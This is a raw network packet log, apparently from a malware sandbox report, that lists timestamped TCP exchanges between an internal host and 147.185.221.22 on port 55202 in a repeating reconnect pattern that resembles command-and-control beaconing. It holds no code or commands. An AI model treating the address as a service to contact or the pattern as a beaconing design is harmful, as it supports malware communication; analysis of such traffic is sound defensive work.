                                                            Sep 25, 2024 08:30:08.667649031 CEST4916555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:08.672646046 CEST5520249165147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:08.764086008 CEST4916555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:08.769082069 CEST5520249165147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:10.903234959 CEST5520249165147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:10.903292894 CEST4916555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:12.507654905 CEST4916555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:12.512577057 CEST5520249165147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:12.529118061 CEST4916655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:12.533952951 CEST5520249166147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:12.534030914 CEST4916655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:12.550307035 CEST4916655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:12.555150986 CEST5520249166147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:12.632855892 CEST4916655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:12.637828112 CEST5520249166147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:12.758004904 CEST4916655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:12.762990952 CEST5520249166147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:12.866923094 CEST4916655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:12.872364044 CEST5520249166147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:12.960562944 CEST4916655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:12.965542078 CEST5520249166147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:13.195014000 CEST4916655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:13.199945927 CEST5520249166147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:13.433554888 CEST4916655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:13.439662933 CEST5520249166147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:15.192543030 CEST5520249166147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:15.192662954 CEST4916655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:18.404501915 CEST4916655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:18.409524918 CEST5520249166147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:18.426151991 CEST4916755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:18.431020021 CEST5520249167147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:18.431113005 CEST4916755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:18.448858023 CEST4916755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:18.453747988 CEST5520249167147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:18.529701948 CEST4916755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:18.534612894 CEST5520249167147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:18.654366016 CEST4916755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:18.659327984 CEST5520249167147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:18.763530016 CEST4916755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:19.059601068 CEST4916755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:19.668101072 CEST4916755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:19.770437002 CEST5520249167147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:19.770479918 CEST5520249167147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:19.770490885 CEST5520249167147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:21.100167990 CEST5520249167147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:21.100279093 CEST4916755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:23.724097013 CEST4916755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:23.730262041 CEST5520249167147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:23.746503115 CEST4916855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:23.752213001 CEST5520249168147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:23.752331018 CEST4916855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:23.770214081 CEST4916855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:23.775167942 CEST5520249168147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:23.849116087 CEST4916855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:23.854063988 CEST5520249168147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:23.973951101 CEST4916855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:24.269994020 CEST4916855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:24.878460884 CEST4916855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:24.954746962 CEST5520249168147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:24.954768896 CEST5520249168147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:24.955707073 CEST5520249168147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:26.458934069 CEST5520249168147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:26.459060907 CEST4916855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:28.809850931 CEST4916855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:28.814953089 CEST5520249168147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:29.019968987 CEST4916955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:29.025666952 CEST5520249169147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:29.025719881 CEST4916955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:29.058845043 CEST4916955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:29.063774109 CEST5520249169147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:29.144624949 CEST4916955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:29.149566889 CEST5520249169147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:29.511511087 CEST4916955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:29.519885063 CEST5520249169147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:29.966582060 CEST4916955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:29.971517086 CEST5520249169147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:29.976713896 CEST4916955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:29.981539965 CEST5520249169147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:30.102067947 CEST4916955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:30.106971025 CEST5520249169147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:30.234181881 CEST4916955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:30.239093065 CEST5520249169147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:30.342293978 CEST4916955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:30.349128008 CEST5520249169147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:31.697808027 CEST5520249169147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:31.697873116 CEST4916955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:32.522782087 CEST4916955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:32.527620077 CEST5520249169147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:32.705319881 CEST4917055202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:32.711302996 CEST5520249170147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:32.711405039 CEST4917055202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:32.827605963 CEST4917055202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:32.832592010 CEST5520249170147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:32.928428888 CEST4917055202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:32.933346033 CEST5520249170147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:33.037688017 CEST4917055202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:33.042937994 CEST5520249170147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:33.146718979 CEST4917055202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:33.151699066 CEST5520249170147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:33.255830050 CEST4917055202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:33.260691881 CEST5520249170147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:33.380692005 CEST4917055202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:33.385704994 CEST5520249170147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:35.383233070 CEST5520249170147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:35.383327007 CEST4917055202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:38.294507980 CEST4917055202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:38.299454927 CEST5520249170147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:38.310095072 CEST4917155202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:38.314964056 CEST5520249171147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:38.315016985 CEST4917155202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:38.334196091 CEST4917155202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:38.340226889 CEST5520249171147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:38.419455051 CEST4917155202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:38.424345016 CEST5520249171147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:38.528723955 CEST4917155202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:38.533718109 CEST5520249171147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:38.638027906 CEST4917155202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:38.642992973 CEST5520249171147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:38.747068882 CEST4917155202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:38.753045082 CEST5520249171147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:40.949825048 CEST5520249171147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:40.949994087 CEST4917155202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:41.523736000 CEST4917155202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:41.528616905 CEST5520249171147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:41.543869972 CEST4917255202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:41.548851967 CEST5520249172147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:41.548937082 CEST4917255202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:41.565289974 CEST4917255202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:41.570090055 CEST5520249172147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:41.648823977 CEST4917255202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:41.653747082 CEST5520249172147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:41.757910013 CEST4917255202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:41.762842894 CEST5520249172147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:41.867410898 CEST4917255202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:41.872467041 CEST5520249172147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:41.976329088 CEST4917255202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:41.981416941 CEST5520249172147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:44.182933092 CEST5520249172147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:44.183115005 CEST4917255202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:44.956193924 CEST4917255202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:44.961050034 CEST5520249172147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:44.970328093 CEST4917355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:44.975260973 CEST5520249173147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:44.975338936 CEST4917355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:44.992650986 CEST4917355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:44.997525930 CEST5520249173147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:45.080909967 CEST4917355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:45.085875988 CEST5520249173147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:45.190212011 CEST4917355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:45.196321964 CEST5520249173147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:45.299850941 CEST4917355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:45.304780960 CEST5520249173147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:45.408668041 CEST4917355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:45.413618088 CEST5520249173147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:47.653217077 CEST5520249173147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:47.653336048 CEST4917355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:48.668843031 CEST4917355202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:48.673909903 CEST5520249173147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:48.685508013 CEST4917455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:48.690428972 CEST5520249174147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:48.690519094 CEST4917455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:48.710494041 CEST4917455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:48.715426922 CEST5520249174147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:48.793890953 CEST4917455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:48.798834085 CEST5520249174147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:48.903115034 CEST4917455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:48.908212900 CEST5520249174147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:49.012168884 CEST4917455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:49.017193079 CEST5520249174147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:49.121388912 CEST4917455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:49.126416922 CEST5520249174147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:51.377294064 CEST5520249174147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:51.377530098 CEST4917455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:53.301760912 CEST4917455202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:53.307003975 CEST5520249174147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:53.323704004 CEST4917555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:53.329869986 CEST5520249175147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:53.329982042 CEST4917555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:53.348031044 CEST4917555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:53.352869987 CEST5520249175147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:53.426733017 CEST4917555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:53.431734085 CEST5520249175147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:53.551668882 CEST4917555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:53.556562901 CEST5520249175147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:53.645288944 CEST4917555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:53.801753044 CEST5520249175147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:53.801953077 CEST4917555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:53.808191061 CEST5520249175147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:53.988544941 CEST4917555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:53.993417978 CEST5520249175147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:56.029182911 CEST5520249175147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:56.029432058 CEST4917555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:57.545418024 CEST4917555202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:57.550308943 CEST5520249175147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:57.561016083 CEST4917655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:57.565829039 CEST5520249176147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:57.567156076 CEST4917655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:57.590123892 CEST4917655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:57.594989061 CEST5520249176147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:57.670792103 CEST4917655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:57.675700903 CEST5520249176147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:57.779407978 CEST4917655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:57.784301996 CEST5520249176147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:57.888602018 CEST4917655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:57.893631935 CEST5520249176147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:30:57.997874022 CEST4917655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:30:58.003482103 CEST5520249176147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:00.235888958 CEST5520249176147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:00.236057043 CEST4917655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:02.209502935 CEST4917655202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:02.214451075 CEST5520249176147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:02.224417925 CEST4917755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:02.229351997 CEST5520249177147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:02.229437113 CEST4917755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:02.254137993 CEST4917755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:02.258923054 CEST5520249177147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:02.334551096 CEST4917755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:02.339441061 CEST5520249177147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:02.443759918 CEST4917755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:02.449014902 CEST5520249177147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:02.553103924 CEST4917755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:02.559561014 CEST5520249177147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:02.662147045 CEST4917755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:02.667057037 CEST5520249177147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:04.881345987 CEST5520249177147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:04.881475925 CEST4917755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:05.688183069 CEST4917755202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:05.693310022 CEST5520249177147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:05.703988075 CEST4917855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:05.708918095 CEST5520249178147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:05.708998919 CEST4917855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:05.727116108 CEST4917855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:05.732006073 CEST5520249178147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:05.828922033 CEST4917855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:05.833841085 CEST5520249178147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:05.922692060 CEST4917855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:05.927643061 CEST5520249178147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:06.031836987 CEST4917855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:06.036818981 CEST5520249178147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:06.140856981 CEST4917855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:06.147284031 CEST5520249178147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:06.281491995 CEST4917855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:06.286456108 CEST5520249178147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:07.903568983 CEST4917855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:07.908653021 CEST5520249178147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:08.390966892 CEST5520249178147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:08.391086102 CEST4917855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:09.791158915 CEST4917855202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:09.885540962 CEST5520249178147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:09.895299911 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:09.900122881 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:09.900188923 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:09.917241096 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:09.922199011 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:10.009902000 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:10.014803886 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:10.119086981 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:10.123953104 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:10.228245020 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:10.233374119 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:10.337491989 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:10.342457056 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:10.555799961 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:10.560662031 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:10.774411917 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:10.779361963 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:10.992631912 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:10.997607946 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.210988045 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.215857983 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.429433107 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.434371948 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.625510931 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.630994081 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.632148027 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.637417078 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.776676893 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.781677008 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.797013044 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.801837921 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.803517103 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.808316946 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.820130110 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.825731993 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.837752104 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.842658043 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.850471973 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.855381966 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.892002106 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.896884918 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.927944899 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.934259892 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.944142103 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.949021101 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.965509892 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.970374107 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:11.976804972 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:11.981710911 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.042968988 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.048003912 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.094033957 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.098956108 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.101569891 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.106456041 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.172658920 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.177695036 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.178137064 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.183137894 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.199001074 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.207168102 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.209412098 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.214272022 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.224908113 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.229752064 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.250881910 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.255790949 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.256500006 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.261509895 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.316811085 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.321775913 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.331460953 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.336321115 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.389996052 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.394872904 CEST5520249179147.185.221.22192.168.2.22
                                                            Sep 25, 2024 08:31:12.402455091 CEST4917955202192.168.2.22147.185.221.22
                                                            Sep 25, 2024 08:31:12.408024073 CEST5520249179147.185.221.22192.168.2.22
